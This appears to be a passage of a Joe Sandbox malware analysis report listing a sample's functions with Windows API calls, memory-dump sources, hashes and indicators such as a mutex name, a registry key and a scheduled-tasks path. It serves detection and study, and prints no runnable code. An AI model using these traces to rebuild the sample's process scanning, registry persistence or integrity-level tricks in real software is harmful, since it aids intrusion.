                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264BBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 0264BC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,75775d6fa), ref: 0264BC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 75775d6fa
                                                                                                                                                                                                              • API String ID: 410342393-3787332362
                                                                                                                                                                                                              • Opcode ID: 475ce88a204cf491446fbe0d41582200303bb4f531efa67da6411e197adcbfa0
                                                                                                                                                                                                              • Instruction ID: 5d72dbea06db2daba46518dc3d2a5a354635a4e20292d109c2b6b7a0c33a0194
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 475ce88a204cf491446fbe0d41582200303bb4f531efa67da6411e197adcbfa0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31C7B1E4020DAFDB40CFA9D885AEEBBF4FB48715F50816AE509E7240E7749A45CF90
                                                                                                                                                                                                              Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76A8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              Function 02664BF0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02664C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02664C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02664C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 02664C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 02664C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02664C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: b1fe802293670035df8a982b86978814d98946024a7da837b4d4cf8278da53d5
                                                                                                                                                                                                              • Instruction ID: 376948a5a157e08f4ef6f0162b3844c1d89bcdc1c0320ece496d2f3db0bbde62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1fe802293670035df8a982b86978814d98946024a7da837b4d4cf8278da53d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0711C672505210ABD320DE65DC48AAFBBA9EF85360F408619FD5583380EB309555CBF2
                                                                                                                                                                                                              Function 026712F0 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02671314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 0267131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 0267132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 02671336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02671350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 02671363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 0267136E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 298246419-0
                                                                                                                                                                                                              • Opcode ID: a93ca6649e2838d8230651e60d691408274ee7ea49943decfcd043b9435dac22
                                                                                                                                                                                                              • Instruction ID: d29ec076a3ad66472fde3857ae069d1451b2541623e13a7ed64d864b53c6115f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a93ca6649e2838d8230651e60d691408274ee7ea49943decfcd043b9435dac22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57118431E40204AFDB009FA9DC44BAEB7B9FF45361F81876AF916E7390D77095508B61
                                                                                                                                                                                                              Function 02651846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 026518AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(-80000001,7577588Da,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 026518CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 026518DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 026518F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 7577588Da$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-3005012126
                                                                                                                                                                                                              • Opcode ID: 917cc2182c75326f7657257de565fdd4098d87b877de41c9c0c9291b1a0e2090
                                                                                                                                                                                                              • Instruction ID: 63e09ce6499907fd920b2ec35988ef23f0bfb4df2ac7a3330cf3167252582683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 917cc2182c75326f7657257de565fdd4098d87b877de41c9c0c9291b1a0e2090
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11E374B00258ABEB24DBA0CCC8FEE3369EB45704F6045ACFA8AD7140D774DE848B50
                                                                                                                                                                                                              Function 0264D890 Relevance: 10.6, APIs: 7, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0264D860,00000000,00000000,00000000), ref: 0264D8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400), ref: 0264D8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400,?), ref: 0264D8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02649D7A,?,?,?,?,02649F49,00000000,?,?,?,?,02649400), ref: 0264D8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264D917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 0264D92B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 731183410-0
                                                                                                                                                                                                              • Opcode ID: 7cbcd5e3f80f921f8a76fc6a401fcc84ba68b81c94996a4e13c2b9b97605fe07
                                                                                                                                                                                                              • Instruction ID: 60e56b8823b5a2b5ad8e6a4a35b2492b0bc0ea6f8e1b74c937594f0229c50eab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cbcd5e3f80f921f8a76fc6a401fcc84ba68b81c94996a4e13c2b9b97605fe07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311A530E81214BBE7109F60DC0DFAE37E8AF09B14F555654F905AB2C1DBB459508B99
                                                                                                                                                                                                              Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Function 026598F0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 0265990B
                                                                                                                                                                                                              • shutdown.WS2_32(026599EC,00000001), ref: 02659910
                                                                                                                                                                                                              • recv.WS2_32(026599EC,?,00000400,00000000), ref: 0265992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02659945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02659959
                                                                                                                                                                                                              • closesocket.WS2_32(026599EC), ref: 0265995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02659960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1638183600-0
                                                                                                                                                                                                              • Opcode ID: f2e2364ca3ea94a92da0e5961804ec26bce16f5c72dc129816ae30b4d54dbcf3
                                                                                                                                                                                                              • Instruction ID: 799b81a161ad86b59e285d20fb9315a876144bc9835c53fe00ac4389573014f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2e2364ca3ea94a92da0e5961804ec26bce16f5c72dc129816ae30b4d54dbcf3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F0A4B2990328BBDB209A64CC45F9F3B6CEB48750F055500BB09BB280D6B4B840CEE5
                                                                                                                                                                                                              Function 02661930 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 0266193E
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 0266195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02661962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02661974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02661985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                              • API String ID: 1370207991-2011349651
                                                                                                                                                                                                              • Opcode ID: 7e42e38a139c25e3eea9b52333d8846c414cb61dce499e6324c3261244622fbd
                                                                                                                                                                                                              • Instruction ID: 4abde2507b5711e4a7aa8583bb37e02279a07f06387eedfe5a85794a1ed051fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e42e38a139c25e3eea9b52333d8846c414cb61dce499e6324c3261244622fbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F02E30DD2214B7E31067E19C0DB6F7BBC9F05B05F550B55FD0BA5380DBA05A5046E6
                                                                                                                                                                                                              Function 02648820 Relevance: 9.1, APIs: 6, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32(00000000,?,00000000), ref: 026488B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 026488C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 026488DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 026488E6
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?), ref: 026488F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02648915
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3485819771-0
                                                                                                                                                                                                              • Opcode ID: 70d749c9871dbd81f10e5fb4eb2794fcadf44d89eade6e36ed73b1cdb0f15832
                                                                                                                                                                                                              • Instruction ID: ddc10da6e7566f6ff1ca963189ca4bc5da328d9aa3752a34fdbd17ab44937864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70d749c9871dbd81f10e5fb4eb2794fcadf44d89eade6e36ed73b1cdb0f15832
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7431E435E41205AFCB10CF69DD84AAE7BBAAF89350B288969E8459B301DF31D851CB90
                                                                                                                                                                                                              Function 02642850 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 45dd7c2275b50caefba27b45c70589f9afe3eef2c5af6d57391a894b7f498c83
                                                                                                                                                                                                              • Instruction ID: 6ace6573db549cf60c12e10d615b03518d170814a5d10b238b7f032f3b37ed6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45dd7c2275b50caefba27b45c70589f9afe3eef2c5af6d57391a894b7f498c83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1214BB1A40309AFDB10CF58DC90AAF77A8FF49310F140529FD8597340EBB1A9548BA1
                                                                                                                                                                                                              Function 026652D0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 026652EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0266531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 02665338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 0266533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0266534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02665364
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              • Opcode ID: 05051f422226eb9e93b7eebb54bb53d0cccbda96a1595d10c37bec4215a6b72a
                                                                                                                                                                                                              • Instruction ID: 2fb95779a92185231552caa3fec11d5d940f14204ad6ed96b45ba18c13ff26c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05051f422226eb9e93b7eebb54bb53d0cccbda96a1595d10c37bec4215a6b72a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0118671B80309BBEB2095589C87FBE7768DB40F50F944915FB05FA1C0E6E1E491C6A4
                                                                                                                                                                                                              Function 0264BAA1 Relevance: 9.0, APIs: 6, Instructions: 46synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264BAAF
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264BAD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264BAE2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 0264BB17
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264BB1E
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264BB2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1675675969-0
                                                                                                                                                                                                              • Opcode ID: 72b2ffceec2aa945684010493945b6363106fa924f6c2405c70b72a61b65e86b
                                                                                                                                                                                                              • Instruction ID: 51c7cd6324ef8110fdb93aba28436b03d1787b0e16293f4da3c3ea7fdd0ff453
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72b2ffceec2aa945684010493945b6363106fa924f6c2405c70b72a61b65e86b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201F531E41210ABC7049F64FC08FDD37A0AF44728F965BA5E8429B281DFB198938F91
                                                                                                                                                                                                              Function 0264B920 Relevance: 9.0, APIs: 6, Instructions: 37synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264B92D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 0264B980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264B99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 0264B9AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
